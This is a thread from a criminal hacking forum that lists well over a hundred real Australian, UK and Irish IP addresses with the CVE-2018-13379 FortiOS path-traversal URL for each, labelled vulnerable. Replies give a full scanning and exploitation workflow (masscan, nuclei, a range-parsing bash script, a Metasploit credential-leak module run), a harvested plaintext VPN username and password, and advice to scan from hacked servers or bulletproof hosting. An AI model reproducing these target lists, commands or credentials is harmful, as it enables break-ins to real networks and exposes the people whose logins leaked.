• XSS.stack #1 – первый литературный журнал от юзеров форума

[CVE-2018-13379] - Australia

Prokhorenco

(L3) cache
Пользователь
Регистрация
18.02.2023
Сообщения
192
Реакции
305
Australia vulns for CVE-2018-13379

Код:
[CVE-2018-13379] [http] [critical] https://103.104.165.110:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://110.141.231.191:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://110.142.29.126:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://110.145.210.30:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://110.150.26.114:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://110.174.130.210:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://111.220.187.96:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://115.64.165.43:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://115.64.231.106:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://115.70.192.127:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://115.70.226.9:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://115.70.230.21:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://115.70.231.23:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://120.151.105.122:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://121.200.209.23:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://122.252.3.10:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://123.103.198.150:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://123.3.142.128:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://124.148.24.84:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://124.148.26.103:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://124.171.134.254:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://124.254.67.226:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://124.254.96.150:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://138.217.110.90:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://139.130.164.251:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://139.130.54.74:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://139.130.87.30:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://139.218.247.175:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://14.201.73.174:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://14.201.90.246:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://14.203.192.69:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://159.196.156.202:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://159.196.160.127:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://175.103.19.34:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://180.150.91.2:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://182.239.253.34:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://193.114.143.14:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://193.114.150.126:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://193.114.99.170:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://202.153.211.16:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://202.169.116.123:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://203.153.206.82:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://203.17.151.169:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://203.194.48.254:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://203.206.139.45:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://203.45.160.189:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://203.59.221.42:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://210.10.241.170:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://220.233.144.89:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://220.233.77.194:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://220.233.86.226:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://220.244.141.243:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://220.244.34.190:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://27.33.218.46:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://43.248.54.61:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://49.176.147.127:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://49.255.104.94:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://49.255.10.202:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://49.255.171.122:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://58.164.12.131:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://58.171.46.83:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://58.172.158.167:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://58.6.92.70:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://60.240.130.122:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://60.241.62.178:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://61.69.254.90:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
 
United Kingdom vulns for CVE-2018-13379
Код:
[CVE-2018-13379] [http] [critical] https://213.121.161.121:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://213.123.144.164:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.158.235.180:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.33.30.66:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.38.39.98:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.46.147.1:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://31.121.10.186:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://35.179.2.51:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://37.153.73.225:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://37.200.118.33:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://37.35.91.50:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://46.18.171.34:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://5.2.121.198:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.148.43.97:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.155.184.117:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.155.215.33:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.219.207.70:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.219.71.74:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.219.85.226:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://51.52.191.218:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://62.172.109.210:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://62.232.215.234:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://62.6.160.250:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://62.6.47.42:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://62.7.227.2:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://77.221.164.204:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://79.66.49.65:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://79.78.8.149:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://80.229.158.248:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://80.234.162.120:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.128.146.61:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.130.234.208:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.133.151.196:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.133.240.206:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.133.72.23:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.134.36.79:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.149.44.134:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.150.122.2:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.168.13.160:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.2.170.210:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://82.13.24.150:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://82.38.147.185:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://82.69.219.81:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://83.100.219.194:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://83.244.182.241:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://83.244.213.50:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://85.236.149.206:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.169.139.182:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.188.140.98:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.188.245.2:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.4.143.132:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.4.81.194:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://88.212.143.166:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://89.213.48.79:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://91.192.209.123:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://92.207.79.251:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://92.27.88.163:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] http://109.237.26.87:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] http://109.237.26.87:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://137.22.167.122:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] http://143.42.108.102:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://148.252.203.166:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://157.231.120.86:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://167.98.172.222:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://185.147.89.186:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://185.163.111.75:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://185.64.225.60:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://185.71.37.114:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://185.79.57.58:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://188.39.50.52:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://188.39.50.53:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://188.39.50.54:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://188.39.50.50:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://188.39.50.51:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://193.117.137.98:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://193.117.152.166:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://195.188.181.138:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://212.139.247.90:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://109.159.203.58:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://109.170.206.217:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] http://109.237.26.87:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://193.237.133.112:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://195.188.181.138:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://195.99.216.98:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://20.108.152.102:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://109.159.203.58:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://140.228.66.68:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://185.163.111.75:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.158.235.180:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.38.39.98:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://217.46.147.1:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://37.35.91.50:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://5.2.121.198:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://77.221.164.204:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://79.78.8.149:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.130.234.208:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.149.44.134:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://81.168.13.160:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.4.81.194:443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
 
Последнее редактирование:
Ireland vulns for CVE-2018-13379
Код:
[CVE-2018-13379] [http] [critical] https://34.247.120.240:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.43.104.105:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://86.43.94.141:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://89.101.11.34:4443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[CVE-2018-13379] [http] [critical] https://91.123.237.29:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
 
Reply
Как сканировать и находить диапазоны IP?
для ssl впн
This is what i do:
Scan:
Bash:
masscan -Pn -sS -iL ranges.txt --rate 25000 -p4443,10443,8443,443 --open-only --excludefile block.txt --output-format list --output-file results.txt
ip-address:port
Bash:
awk '{ print $4 ":" $3 }' results.txt > final_results.txt
Vuln scan using nuclei:
Bash:
nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt

IP ranges: https://lite.ip2location.com/ip-address-ranges-by-country and parse ranges (copy and paste web page into text editor):
Bash:
#!/bin/bash

if [ $# -ne 3 ]; then
    echo "Usage: $0 in.txt -o out.txt"
    exit 1
fi

input_file=$1
output_file=$3

while IFS= read -r line; do
    start_ip=$(echo "$line" | awk '{print $1}')
    end_ip=$(echo "$line" | awk '{print $2}')
  
    start_ip_range=$(echo "$start_ip" | awk -F. '{print $1"."$2"."$3"."$4}')
    end_ip_range=$(echo "$end_ip" | awk -F. '{print $1"."$2"."$3"."$4}' | awk -F, '{print $1}')
  
    echo "$start_ip_range-$end_ip_range"
done < "$input_file" > "$output_file"
Block.txt file: https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2

You need a bullet proof hoster if you want to do this though.
 
Спасибо, один вопрос, это скрипт bash для установки файла диапазона IP?
Copy and paste (Ctrl + A & Ctrl + C & Ctrl + V) into a file. So for usa.txt you do this and then do: ./range_parse.sh usa.txt -o USA.txt then:
Bash:
masscan -Pn -sS -iL usa.txt --rate 25000 -p4443,10443,8443,443 --open-only --excludefile block.txt --output-format list --output-file results.txt
See https://xss.pro/threads/88914/ for usa.txt ranges.
 
Copy and paste (Ctrl + A & Ctrl + C & Ctrl + V) into a file. So for usa.txt you do this and then do: ./range_parse.sh usa.txt -o USA.txt then:
Bash:
masscan -Pn -sS -iL usa.txt --rate 25000 -p4443,10443,8443,443 --open-only --excludefile block.txt --output-format list --output-file results.txt
See https://xss.pro/threads/88914/ for usa.txt ranges.
Спасибо, у меня впс
Если хочешь, могу дать тебе в пользование
Чтобы быстрее сканировать IP
 
Пожалуйста, обратите внимание, что пользователь заблокирован
sophos_vulns.png

I run my own checks of sophos 0-day rce from 30K under usa i only got 5.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
You need a bullet proof hoster if you want to do this though.
Hey @Prokhorenko, any suggestions regarding a couple of bulletproof vps hosters?
Currently working with Indenesia region so probably it will be good idea to find VPS hosting providers which is closely to in-scope area?
 
Hey @Prokhorenko, any suggestions regarding a couple of bulletproof vps hosters?
Currently working with Indenesia region so probably it will be good idea to find VPS hosting providers which is closely to in-scope area?
I use hacked servers not bullet proof so i cant recommend a provider for you. It's best to scan in a region close to your target yes. Bullet proof hosters in Russia or Asia might be black listed so it's best to use western servers.
 
I use hacked servers not bullet proof so i cant recommend a provider for you. It's best to scan in a region close to your target yes. Bullet proof hosters in Russia or Asia might be black listed so it's best to use western servers.
Got it thanks for explanation, probably this is the nice case to use pwned dedicated hosts in related area.
Also looks the using ability of western vps providers not an option for me (It seems to be to close for me, you know))...
Anyway thanks, appreciate for help.
 
This is what i do:
Scan:
Bash:
masscan -Pn -sS -iL ranges.txt --rate 25000 -p4443,10443,8443,443 --open-only --excludefile block.txt --output-format list --output-file results.txt
ip-address:port
Bash:
awk '{ print $4 ":" $3 }' results.txt > final_results.txt
Vuln scan using nuclei:
Bash:
nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt

IP ranges: https://lite.ip2location.com/ip-address-ranges-by-country and parse ranges (copy and paste web page into text editor):
Bash:
#!/bin/bash

if [ $# -ne 3 ]; then
    echo "Usage: $0 in.txt -o out.txt"
    exit 1
fi

input_file=$1
output_file=$3

while IFS= read -r line; do
    start_ip=$(echo "$line" | awk '{print $1}')
    end_ip=$(echo "$line" | awk '{print $2}')
 
    start_ip_range=$(echo "$start_ip" | awk -F. '{print $1"."$2"."$3"."$4}')
    end_ip_range=$(echo "$end_ip" | awk -F. '{print $1"."$2"."$3"."$4}' | awk -F, '{print $1}')
 
    echo "$start_ip_range-$end_ip_range"
done < "$input_file" > "$output_file"
Block.txt file: https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2

You need a bullet proof hoster if you want to do this though.
можешь написать, что ты делаешь после получения доступа?
 
можешь написать, что ты делаешь после получения доступа?
Код:
user@host:~$ msfconsole
StArting the Metasploit Framework console...
Код:
msf6 > search CVE-2018-13379

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/gather/fortios_vpnssl_traversal_creds_leak                   normal  No     FortiOS Path Traversal Credential Gatherer


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
Код:
msf6 > use 0
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
Код:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set rhosts 110.141.231.191
rhosts => 110.141.231.191
Код:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run

[*] https://46.18.171.34:10443 - Trying to connect.
[+] https://46.18.171.34:10443 - Vulnerable!
[+] https://46.18.171.34:10443 - File saved to /home/ubuntu/.msf4/loot/20230602185931_default_46.18.171.34__715108.txt
[+] https://46.18.171.34:10443 - 1 credential(s) found!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Код:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
Credentials
===========

host          origin        service            public  private                           realm  private_type  JtR Format
----          ------        -------            ------  -------                           -----  ------------  ----------
46.18.171.34  46.18.171.34  10443/tcp (https)  sean    77lillandslanebrighousecomputers         Password

You can improve this by changing RPORT and using set RHOSTS file:targets.txt. For creds to work just do: sudo systemctl start postgresql, msfdb init.

https://xss.pro/threads/83327/post-622477
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх